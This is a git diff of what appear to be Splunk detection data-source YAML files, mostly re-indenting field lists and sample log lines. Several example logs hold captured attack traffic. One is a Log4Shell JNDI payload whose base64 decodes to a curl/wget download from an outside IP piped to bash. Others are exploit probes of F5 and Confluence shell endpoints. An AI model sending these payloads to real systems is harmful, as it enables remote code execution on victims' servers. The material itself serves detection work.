||||
- date_zone
|
||||
- host
|
||||
- index
|
||||
- linecount
|
||||
- punct
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
example_log: May 10 11:08:39 sjc.example.com 1,2022/05/10 11:08:38,013201004583,THREAT,url,2305,2022/05/10
|
||||
- _time
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- host
|
||||
- index
|
||||
- linecount
|
||||
- punct
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
example_log:
|
||||
May 10 11:08:39 sjc.example.com 1,2022/05/10 11:08:38,013201004583,THREAT,url,2305,2022/05/10
|
||||
11:08:38,2.18.4.7,1.2.3.4,2.18.4.7,1.2.3.4,service-globalprotect,,,web-browsing,vsys1,UNTRUST,UNTRUST,ethernet1/20,loopback.1,Zero,2022/05/10
|
||||
11:08:38,1535535,1,32880,443,32880,20077,0x1403000,tcp,allow,"sr.example.com/mgmt/tm/util/bash",(9999),allow-URL,informational,client-to-server,7081856864553612091,0xa000000000000000,United
|
||||
States,United States,0,,0,,,1,"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36
|
||||
|
||||
@@ -3,32 +3,32 @@ id: 182a83bc-c31a-4817-8c7a-263744cec52a
|
||||
author: Patrick Bareiss, Splunk
|
||||
source: screenconnect_palo_traffic
|
||||
sourcetype: pan:traffic
|
||||
separator: null
|
||||
supported_TA:
|
||||
name: Palo Alto Networks Add-on for Splunk
|
||||
version: 8.1.1
|
||||
url: https://splunkbase.splunk.com/app/2757
|
||||
event_names: []
|
||||
fields:
|
||||
- _time
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- host
|
||||
- index
|
||||
- linecount
|
||||
- punct
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
example_log: 577 <14>1 2024-02-22T12:33:50-05:00 PALO220.ATTACK_RANGE.LAN - - - -
|
||||
- _time
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- host
|
||||
- index
|
||||
- linecount
|
||||
- punct
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
example_log:
|
||||
577 <14>1 2024-02-22T12:33:50-05:00 PALO220.ATTACK_RANGE.LAN - - - -
|
||||
1,2024/02/22 12:33:50,012801036556,TRAFFIC,end,2305,2024/02/22 12:33:50,192.168.1.205,147.28.146.44,201.17.96.104,147.28.146.44,No_Vuln_Filtering_OUT,,,screenconnect,vsys1,Trust,Untrust,ethernet1/2,ethernet1/1,splunk_range,2024/02/22
|
||||
12:33:50,14740,1,50624,443,11024,443,0x40005e,tcp,allow,7419,6609,810,25,2024/02/22
|
||||
12:32:29,65,any,0,376156893,0x0,192.168.0.0-192.168.255.255,United States,0,14,11,tcp-fin,0,0,0,0,,PALO220,from-policy,,,0,,0,,N/A,0,0,0,0,0862e58b-4a54-436b-b3ac-ea3eccf8403b,0,0,,,,,,,
|
||||
|
||||
@@ -3,59 +3,59 @@ id: b12f601c-7f66-4d31-ab3c-a9ab03a597d5
|
||||
author: Patrick Bareiss, Splunk
|
||||
source: stream
|
||||
sourcetype: stream:http
|
||||
separator: null
|
||||
supported_TA:
|
||||
name: Splunk App for Stream
|
||||
version: 8.1.1
|
||||
url: https://splunkbase.splunk.com/app/1809
|
||||
event_names: []
|
||||
fields:
|
||||
- _time
|
||||
- bytes
|
||||
- bytes_in
|
||||
- bytes_out
|
||||
- cookie
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- dest_ip
|
||||
- dest_mac
|
||||
- dest_port
|
||||
- endtime
|
||||
- flow_id
|
||||
- form_data
|
||||
- host
|
||||
- http_comment
|
||||
- http_content_length
|
||||
- http_content_type
|
||||
- http_method
|
||||
- http_user_agent
|
||||
- index
|
||||
- linecount
|
||||
- protocol_stack
|
||||
- punct
|
||||
- request
|
||||
- server
|
||||
- site
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- src_ip
|
||||
- src_mac
|
||||
- src_port
|
||||
- status
|
||||
- time_taken
|
||||
- timeendpos
|
||||
- timestamp
|
||||
- timestartpos
|
||||
- transport
|
||||
- uri_path
|
||||
example_log: '{"endtime":"2021-04-21T08:12:01.084527Z","timestamp":"2021-04-21T08:12:01.082573Z","bytes":1674,"bytes_in":914,"bytes_out":760,"cookie":"session_id_8000=81beacd6cc82670cf51f101406b6f2e6dc00c023;
|
||||
- _time
|
||||
- bytes
|
||||
- bytes_in
|
||||
- bytes_out
|
||||
- cookie
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- dest_ip
|
||||
- dest_mac
|
||||
- dest_port
|
||||
- endtime
|
||||
- flow_id
|
||||
- form_data
|
||||
- host
|
||||
- http_comment
|
||||
- http_content_length
|
||||
- http_content_type
|
||||
- http_method
|
||||
- http_user_agent
|
||||
- index
|
||||
- linecount
|
||||
- protocol_stack
|
||||
- punct
|
||||
- request
|
||||
- server
|
||||
- site
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- src_ip
|
||||
- src_mac
|
||||
- src_port
|
||||
- status
|
||||
- time_taken
|
||||
- timeendpos
|
||||
- timestamp
|
||||
- timestartpos
|
||||
- transport
|
||||
- uri_path
|
||||
example_log:
|
||||
'{"endtime":"2021-04-21T08:12:01.084527Z","timestamp":"2021-04-21T08:12:01.082573Z","bytes":1674,"bytes_in":914,"bytes_out":760,"cookie":"session_id_8000=81beacd6cc82670cf51f101406b6f2e6dc00c023;
|
||||
splunkweb_csrf_token_8000=13513429838815417873; splunkd_8000=K_rZQa3n41JuL47HXxuyhPs6Uyg8ERiczX9k1NeOAcgeh5ujYRYXTZsScYZFpzbKV4a8q62CvlhCbXYeAHI6vhsEyaR4vE9Rzdq7Mt25A4QrsqooUEcqB_u5bptLgvpr^z1FCN","dest_ip":"10.0.1.12","dest_mac":"02:DA:73:7B:81:70","dest_port":8000,"flow_id":"b18ec342-0a3b-4fb6-b91e-a7b576687fd7","form_data":"output_mode=json&action=touch","http_comment":"HTTP/1.1
|
||||
200 OK","http_content_length":59,"http_content_type":"application/json; charset=UTF-8","http_method":"POST","http_user_agent":"Mozilla/5.0
|
||||
(Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128
|
||||
|
||||
@@ -3,7 +3,6 @@ id: 4b1233d1-f80a-4da1-ab27-a5b10ea8a4ce
|
||||
author: Patrick Bareiss, Splunk
|
||||
source: stream:tcp
|
||||
sourcetype: stream:tcp
|
||||
separator: null
|
||||
supported_TA:
|
||||
name: Splunk App for Stream
|
||||
version: 8.1.1
|
||||
|
||||
@@ -3,93 +3,93 @@ id: 780086dc-2384-45b6-ade7-56cb00105464
|
||||
author: Patrick Bareiss, Splunk
|
||||
source: aws
|
||||
sourcetype: aws:cloudfront:accesslogs
|
||||
separator: null
|
||||
supported_TA:
|
||||
name: Splunk Add-on for Amazon Web Services (AWS)
|
||||
version: 7.4.1
|
||||
url: https://splunkbase.splunk.com/app/1876
|
||||
event_names: []
|
||||
fields:
|
||||
- _time
|
||||
- action
|
||||
- app
|
||||
- bytes
|
||||
- bytes_in
|
||||
- bytes_out
|
||||
- c_ip
|
||||
- c_port
|
||||
- cached
|
||||
- category
|
||||
- client_ip
|
||||
- cs_bytes
|
||||
- cs_cookie
|
||||
- cs_host
|
||||
- cs_method
|
||||
- cs_protocol
|
||||
- cs_protocol_version
|
||||
- cs_referer
|
||||
- cs_uri_query
|
||||
- cs_uri_stem
|
||||
- cs_user_agent
|
||||
- date
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- dest
|
||||
- duration
|
||||
- edge_location_name
|
||||
- eventtype
|
||||
- fle_encrypted_fields
|
||||
- fle_status
|
||||
- host
|
||||
- http_content_type
|
||||
- http_method
|
||||
- http_user_agent
|
||||
- http_user_agent_length
|
||||
- index
|
||||
- linecount
|
||||
- punct
|
||||
- response_time
|
||||
- sc_bytes
|
||||
- sc_content_len
|
||||
- sc_content_type
|
||||
- sc_range_end
|
||||
- sc_range_start
|
||||
- sc_status
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- src
|
||||
- src_ip
|
||||
- src_port
|
||||
- ssl_cipher
|
||||
- ssl_protocol
|
||||
- status
|
||||
- tag
|
||||
- tag::eventtype
|
||||
- time
|
||||
- time_taken
|
||||
- time_to_first_byte
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
- uri_path
|
||||
- url
|
||||
- url_domain
|
||||
- url_length
|
||||
- vendor_product
|
||||
- x_edge_detail_result_type
|
||||
- x_edge_location
|
||||
- x_edge_request_id
|
||||
- x_edge_response_result_type
|
||||
- x_edge_result_type
|
||||
- x_forwarded_for
|
||||
- x_host_header
|
||||
example_log: "2023-11-07\t16:58:21\tIAD55-P5\t921\t44.192.78.55\tGET\td3u5aue66f5ui4.cloudfront.net\t\
|
||||
- _time
|
||||
- action
|
||||
- app
|
||||
- bytes
|
||||
- bytes_in
|
||||
- bytes_out
|
||||
- c_ip
|
||||
- c_port
|
||||
- cached
|
||||
- category
|
||||
- client_ip
|
||||
- cs_bytes
|
||||
- cs_cookie
|
||||
- cs_host
|
||||
- cs_method
|
||||
- cs_protocol
|
||||
- cs_protocol_version
|
||||
- cs_referer
|
||||
- cs_uri_query
|
||||
- cs_uri_stem
|
||||
- cs_user_agent
|
||||
- date
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- dest
|
||||
- duration
|
||||
- edge_location_name
|
||||
- eventtype
|
||||
- fle_encrypted_fields
|
||||
- fle_status
|
||||
- host
|
||||
- http_content_type
|
||||
- http_method
|
||||
- http_user_agent
|
||||
- http_user_agent_length
|
||||
- index
|
||||
- linecount
|
||||
- punct
|
||||
- response_time
|
||||
- sc_bytes
|
||||
- sc_content_len
|
||||
- sc_content_type
|
||||
- sc_range_end
|
||||
- sc_range_start
|
||||
- sc_status
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- src
|
||||
- src_ip
|
||||
- src_port
|
||||
- ssl_cipher
|
||||
- ssl_protocol
|
||||
- status
|
||||
- tag
|
||||
- tag::eventtype
|
||||
- time
|
||||
- time_taken
|
||||
- time_to_first_byte
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
- uri_path
|
||||
- url
|
||||
- url_domain
|
||||
- url_length
|
||||
- vendor_product
|
||||
- x_edge_detail_result_type
|
||||
- x_edge_location
|
||||
- x_edge_request_id
|
||||
- x_edge_response_result_type
|
||||
- x_edge_result_type
|
||||
- x_forwarded_for
|
||||
- x_host_header
|
||||
example_log:
|
||||
"2023-11-07\t16:58:21\tIAD55-P5\t921\t44.192.78.55\tGET\td3u5aue66f5ui4.cloudfront.net\t\
|
||||
/plugins/servlet/com.jsos.shell/ShellServlet\t200\t-\tSlackbot-LinkExpanding%201.0%20(+https://api.slack.com/robots)\t\
|
||||
-\t-\tLambdaGeneratedResponse\tsGwvFCkFU4qlMxatCoJRgW87P7Ee8bKQor3U6lRt6I6jaFvLC7vcPA==\t\
|
||||
confluence.catjamfest.com\thttps\t232\t0.276\t-\tTLSv1.3\tTLS_AES_128_GCM_SHA256\t\
|
||||
|
||||
+66
-66
@@ -3,73 +3,73 @@ id: c5d9612b-0ffd-44d3-8247-3cf3486ec5e2
|
||||
author: Patrick Bareiss, Splunk
|
||||
source: bro:http:json
|
||||
sourcetype: bro:http:json
|
||||
separator: null
|
||||
supported_TA: {}
|
||||
event_names: []
|
||||
fields:
|
||||
- _time
|
||||
- bytes
|
||||
- bytes_in
|
||||
- bytes_out
|
||||
- dest
|
||||
- dest_host
|
||||
- dest_ip
|
||||
- dest_port
|
||||
- direction
|
||||
- dvc
|
||||
- eventtype
|
||||
- flow_id
|
||||
- host
|
||||
- host_header
|
||||
- http_content_type
|
||||
- http_method
|
||||
- http_user_agent
|
||||
- http_user_agent_length
|
||||
- id.orig_h
|
||||
- id.orig_p
|
||||
- id.resp_h
|
||||
- id.resp_p
|
||||
- id_orig_h
|
||||
- id_orig_p
|
||||
- id_resp_h
|
||||
- index
|
||||
- is_broadcast
|
||||
- is_dest_internal_ip
|
||||
- is_src_internal_ip
|
||||
- linecount
|
||||
- method
|
||||
- product
|
||||
- punct
|
||||
- request_body_len
|
||||
- resp_fuids
|
||||
- resp_fuids{}
|
||||
- resp_mime_types
|
||||
- resp_mime_types{}
|
||||
- response_body_len
|
||||
- sensor_name
|
||||
- site
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- src
|
||||
- src_ip
|
||||
- src_port
|
||||
- status
|
||||
- status_code
|
||||
- status_msg
|
||||
- tag
|
||||
- tag::eventtype
|
||||
- timestamp
|
||||
- trans_depth
|
||||
- ts
|
||||
- uid
|
||||
- uri
|
||||
- uri_path
|
||||
- uri_query
|
||||
- url
|
||||
- user_agent
|
||||
- vendor
|
||||
- vendor_product
|
||||
- version
|
||||
example_log: '{"ts":"2022-10-26T18:00:59.345538Z","uid":"CobZQ21IIZvzswjyjh","id.orig_h":"10.0.1.15","id.orig_p":16976,"id.resp_h":"10.0.1.20","id.resp_p":8080,"trans_depth":1,"method":"GET","host":"10.0.1.20","uri":"/?q=${url:UTF-8:https://10.0.1.20:8080.q.cdcnbmk03o13j77svqvgpu44hdbnhypcq.oast.site}","version":"1.1","user_agent":"Mozilla/5.0
|
||||
- _time
|
||||
- bytes
|
||||
- bytes_in
|
||||
- bytes_out
|
||||
- dest
|
||||
- dest_host
|
||||
- dest_ip
|
||||
- dest_port
|
||||
- direction
|
||||
- dvc
|
||||
- eventtype
|
||||
- flow_id
|
||||
- host
|
||||
- host_header
|
||||
- http_content_type
|
||||
- http_method
|
||||
- http_user_agent
|
||||
- http_user_agent_length
|
||||
- id.orig_h
|
||||
- id.orig_p
|
||||
- id.resp_h
|
||||
- id.resp_p
|
||||
- id_orig_h
|
||||
- id_orig_p
|
||||
- id_resp_h
|
||||
- index
|
||||
- is_broadcast
|
||||
- is_dest_internal_ip
|
||||
- is_src_internal_ip
|
||||
- linecount
|
||||
- method
|
||||
- product
|
||||
- punct
|
||||
- request_body_len
|
||||
- resp_fuids
|
||||
- resp_fuids{}
|
||||
- resp_mime_types
|
||||
- resp_mime_types{}
|
||||
- response_body_len
|
||||
- sensor_name
|
||||
- site
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- src
|
||||
- src_ip
|
||||
- src_port
|
||||
- status
|
||||
- status_code
|
||||
- status_msg
|
||||
- tag
|
||||
- tag::eventtype
|
||||
- timestamp
|
||||
- trans_depth
|
||||
- ts
|
||||
- uid
|
||||
- uri
|
||||
- uri_path
|
||||
- uri_query
|
||||
- url
|
||||
- user_agent
|
||||
- vendor
|
||||
- vendor_product
|
||||
- version
|
||||
example_log:
|
||||
'{"ts":"2022-10-26T18:00:59.345538Z","uid":"CobZQ21IIZvzswjyjh","id.orig_h":"10.0.1.15","id.orig_p":16976,"id.resp_h":"10.0.1.20","id.resp_p":8080,"trans_depth":1,"method":"GET","host":"10.0.1.20","uri":"/?q=${url:UTF-8:https://10.0.1.20:8080.q.cdcnbmk03o13j77svqvgpu44hdbnhypcq.oast.site}","version":"1.1","user_agent":"Mozilla/5.0
|
||||
(Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36","request_body_len":0,"response_body_len":121,"status_code":404,"status_msg":"","tags":[],"resp_fuids":["FxuRnn2rNk2RjIfQQ8"],"resp_mime_types":["text/json"]}'
|
||||
|
||||
@@ -3,75 +3,75 @@ id: c716a418-eab3-4df5-9dff-5420174e3068
|
||||
author: Patrick Bareiss, Splunk
|
||||
source: /var/log/nginx/access.log
|
||||
sourcetype: nginx:plus:kv
|
||||
separator: null
|
||||
supported_TA: {}
|
||||
event_names: []
|
||||
fields:
|
||||
- _time
|
||||
- JSESSIONID
|
||||
- action
|
||||
- app
|
||||
- bootstrapStatusProvider_applicationConfig_setupComplete
|
||||
- bytes
|
||||
- bytes_in
|
||||
- bytes_out
|
||||
- category
|
||||
- charset
|
||||
- cookie
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- dest
|
||||
- dest_ip
|
||||
- dest_port
|
||||
- eventtype
|
||||
- host
|
||||
- http_content_type
|
||||
- http_method
|
||||
- http_referer
|
||||
- http_user_agent
|
||||
- http_user_agent_length
|
||||
- http_x_forwarded_for
|
||||
- http_x_header
|
||||
- https
|
||||
- index
|
||||
- linecount
|
||||
- nginx_version
|
||||
- product
|
||||
- protocol
|
||||
- punct
|
||||
- request_time
|
||||
- response_time
|
||||
- server
|
||||
- site
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- src
|
||||
- src_ip
|
||||
- status
|
||||
- status_description
|
||||
- status_type
|
||||
- tag
|
||||
- tag::eventtype
|
||||
- time_local
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
- uri_path
|
||||
- uri_query
|
||||
- url
|
||||
- url_domain
|
||||
- url_length
|
||||
- vendor
|
||||
- vendor_product
|
||||
- version
|
||||
- web_server
|
||||
example_log: site="confluence.catjamfest.com" server="confluence.catjamfest.com" dest_port="80"
|
||||
- _time
|
||||
- JSESSIONID
|
||||
- action
|
||||
- app
|
||||
- bootstrapStatusProvider_applicationConfig_setupComplete
|
||||
- bytes
|
||||
- bytes_in
|
||||
- bytes_out
|
||||
- category
|
||||
- charset
|
||||
- cookie
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- dest
|
||||
- dest_ip
|
||||
- dest_port
|
||||
- eventtype
|
||||
- host
|
||||
- http_content_type
|
||||
- http_method
|
||||
- http_referer
|
||||
- http_user_agent
|
||||
- http_user_agent_length
|
||||
- http_x_forwarded_for
|
||||
- http_x_header
|
||||
- https
|
||||
- index
|
||||
- linecount
|
||||
- nginx_version
|
||||
- product
|
||||
- protocol
|
||||
- punct
|
||||
- request_time
|
||||
- response_time
|
||||
- server
|
||||
- site
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- src
|
||||
- src_ip
|
||||
- status
|
||||
- status_description
|
||||
- status_type
|
||||
- tag
|
||||
- tag::eventtype
|
||||
- time_local
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
- uri_path
|
||||
- uri_query
|
||||
- url
|
||||
- url_domain
|
||||
- url_length
|
||||
- vendor
|
||||
- vendor_product
|
||||
- version
|
||||
- web_server
|
||||
example_log:
|
||||
site="confluence.catjamfest.com" server="confluence.catjamfest.com" dest_port="80"
|
||||
dest_ip="10.0.1.23" src="94.131.112.187" src_ip="94.131.112.187" user="-" time_local="22/Oct/2023:03:03:47
|
||||
+0000" protocol="HTTP/1.1" status="200" bytes_out="7411" bytes_in="7378" http_referer="-"
|
||||
http_user_agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
|
||||
|
||||
@@ -3,32 +3,32 @@ id: 375c2b0e-d216-41ad-9406-200464595209
|
||||
author: Patrick Bareiss, Splunk
|
||||
source: pan:threat
|
||||
sourcetype: pan:threat
|
||||
separator: null
|
||||
supported_TA:
|
||||
name: Palo Alto Networks Add-on for Splunk
|
||||
version: 8.1.1
|
||||
url: https://splunkbase.splunk.com/app/2757
|
||||
event_names: []
|
||||
fields:
|
||||
- _time
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- host
|
||||
- index
|
||||
- linecount
|
||||
- punct
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
example_log: Feb 21 16:10:35 02.examplec.com 1,2023/02/21 16:10:35,016201013292,THREAT,file,2561,2023/02/21
|
||||
- _time
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- host
|
||||
- index
|
||||
- linecount
|
||||
- punct
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
example_log:
|
||||
Feb 21 16:10:35 02.examplec.com 1,2023/02/21 16:10:35,016201013292,THREAT,file,2561,2023/02/21
|
||||
16:10:35,6.1.1.2,5.2.1.1,6.1.1.2,5.2.1.1,service-globalprotect,,,web-browsing,vsys1,UNTRUST,UNTRUST,ethernet1/20,loopback.2,zero,2023/02/21
|
||||
16:10:35,685983,1,48598,443,48598,20077,0x1402000,tcp,alert,"payload.zip",ZIP(52004),allow-example-URL,low,client-to-server,7140821242043239124,0x8000000000000000,Germany,United
|
||||
States,,,0,,,1,,,,,,,,0,177,204,178,197,,02,1.examplecorp.com/configWizard/keyUpload.jsp,,,,0,,0,,N/A,unknown,AppThreat-8677-7862,0x0,0,4294967295,,,be9fa539-d3c9-43f2-b1cb-ae2c91564e4f,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2023-02-21T16:10:35.249+00:00,,,,internet-utility,general-internet,browser-based,4,"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use",,web-browsing,no,no
|
||||
|
||||
@@ -3,39 +3,38 @@ id: b0070a33-92ed-49e5-8f38-576cdf300710
|
||||
author: Patrick Bareiss, Splunk
|
||||
source: stream:http
|
||||
sourcetype: stream:http
|
||||
separator: null
|
||||
supported_TA:
|
||||
name: Splunk App for Stream
|
||||
version: 8.1.1
|
||||
url: https://splunkbase.splunk.com/app/1809
|
||||
event_names: []
|
||||
fields:
|
||||
- _time
|
||||
- count
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- dest_ip
|
||||
- endtime
|
||||
- host
|
||||
- index
|
||||
- linecount
|
||||
- punct
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- src_ip
|
||||
- sum(bytes)
|
||||
- sum(packets_in)
|
||||
- sum(packets_out)
|
||||
- timeendpos
|
||||
- timestamp
|
||||
- timestartpos
|
||||
- values(flow_id){}
|
||||
- vxlan_id
|
||||
example_log: ''
|
||||
- _time
|
||||
- count
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- dest_ip
|
||||
- endtime
|
||||
- host
|
||||
- index
|
||||
- linecount
|
||||
- punct
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- src_ip
|
||||
- sum(bytes)
|
||||
- sum(packets_in)
|
||||
- sum(packets_out)
|
||||
- timeendpos
|
||||
- timestamp
|
||||
- timestartpos
|
||||
- values(flow_id){}
|
||||
- vxlan_id
|
||||
example_log: ""
|
||||
|
||||
@@ -3,74 +3,74 @@ id: c96f5906-f601-4f32-a26c-482535159bc2
|
||||
author: Patrick Bareiss, Splunk
|
||||
source: stream:ip
|
||||
sourcetype: stream:ip
|
||||
separator: null
|
||||
supported_TA:
|
||||
name: Splunk App for Stream
|
||||
version: 8.1.1
|
||||
url: https://splunkbase.splunk.com/app/1809
|
||||
event_names: []
|
||||
fields:
|
||||
- _time
|
||||
- action
|
||||
- app
|
||||
- bytes
|
||||
- bytes_in
|
||||
- bytes_out
|
||||
- category
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- dest
|
||||
- dest_ip
|
||||
- dest_port
|
||||
- eventtype
|
||||
- host
|
||||
- http_content_type
|
||||
- http_method
|
||||
- http_referer
|
||||
- http_referrer
|
||||
- http_user_agent
|
||||
- http_user_agent_length
|
||||
- http_x_forwarded_for
|
||||
- http_x_header
|
||||
- https
|
||||
- index
|
||||
- linecount
|
||||
- nginx_version
|
||||
- product
|
||||
- protocol
|
||||
- punct
|
||||
- request_time
|
||||
- response_time
|
||||
- server
|
||||
- site
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- src
|
||||
- src_ip
|
||||
- status
|
||||
- status_description
|
||||
- status_type
|
||||
- tag
|
||||
- tag::eventtype
|
||||
- time_local
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
- uri_path
|
||||
- url
|
||||
- url_domain
|
||||
- url_length
|
||||
- vendor
|
||||
- vendor_product
|
||||
- version
|
||||
- web_server
|
||||
example_log: site="localhost" server="localhost" dest_port="80" dest_ip="127.0.0.1"
|
||||
- _time
|
||||
- action
|
||||
- app
|
||||
- bytes
|
||||
- bytes_in
|
||||
- bytes_out
|
||||
- category
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- dest
|
||||
- dest_ip
|
||||
- dest_port
|
||||
- eventtype
|
||||
- host
|
||||
- http_content_type
|
||||
- http_method
|
||||
- http_referer
|
||||
- http_referrer
|
||||
- http_user_agent
|
||||
- http_user_agent_length
|
||||
- http_x_forwarded_for
|
||||
- http_x_header
|
||||
- https
|
||||
- index
|
||||
- linecount
|
||||
- nginx_version
|
||||
- product
|
||||
- protocol
|
||||
- punct
|
||||
- request_time
|
||||
- response_time
|
||||
- server
|
||||
- site
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- src
|
||||
- src_ip
|
||||
- status
|
||||
- status_description
|
||||
- status_type
|
||||
- tag
|
||||
- tag::eventtype
|
||||
- time_local
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
- uri_path
|
||||
- url
|
||||
- url_domain
|
||||
- url_length
|
||||
- vendor
|
||||
- vendor_product
|
||||
- version
|
||||
- web_server
|
||||
example_log:
|
||||
site="localhost" server="localhost" dest_port="80" dest_ip="127.0.0.1"
|
||||
src="127.0.0.1" src_ip="127.0.0.1" user="-" time_local="14/Dec/2021:00:41:27 +0000"
|
||||
protocol="HTTP/1.1" status="400" bytes_out="262" bytes_in="196" http_referer="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC85Ni4xMjYuOTYuMTY6ODA4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC85Ni4xMjYuOTYuMTY6ODA4MCl8YmFzaA==}]"
|
||||
http_user_agent="curl/7.58.0" nginx_version="1.21.3" http_x_forwarded_for="-" http_x_header="-"
|
||||
|
||||
@@ -3,54 +3,53 @@ id: 64b245d4-a4d1-4865-a718-c83d3b939f2e
|
||||
author: Patrick Bareiss, Splunk
|
||||
source: suricata
|
||||
sourcetype: suricata
|
||||
separator: null
|
||||
supported_TA: {}
|
||||
event_names: []
|
||||
fields:
|
||||
- _time
|
||||
- app_proto
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- dest_ip
|
||||
- dest_port
|
||||
- event_type
|
||||
- flow.age
|
||||
- flow.alerted
|
||||
- flow.bytes_toclient
|
||||
- flow.bytes_toserver
|
||||
- flow.end
|
||||
- flow.pkts_toclient
|
||||
- flow.pkts_toserver
|
||||
- flow.reason
|
||||
- flow.start
|
||||
- flow.state
|
||||
- flow_id
|
||||
- host
|
||||
- in_iface
|
||||
- index
|
||||
- linecount
|
||||
- proto
|
||||
- punct
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- src_ip
|
||||
- src_port
|
||||
- tcp.ack
|
||||
- tcp.fin
|
||||
- tcp.psh
|
||||
- tcp.state
|
||||
- tcp.syn
|
||||
- tcp.tcp_flags
|
||||
- tcp.tcp_flags_tc
|
||||
- tcp.tcp_flags_ts
|
||||
- timeendpos
|
||||
- timestamp
|
||||
- timestartpos
|
||||
- _time
|
||||
- app_proto
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- dest_ip
|
||||
- dest_port
|
||||
- event_type
|
||||
- flow.age
|
||||
- flow.alerted
|
||||
- flow.bytes_toclient
|
||||
- flow.bytes_toserver
|
||||
- flow.end
|
||||
- flow.pkts_toclient
|
||||
- flow.pkts_toserver
|
||||
- flow.reason
|
||||
- flow.start
|
||||
- flow.state
|
||||
- flow_id
|
||||
- host
|
||||
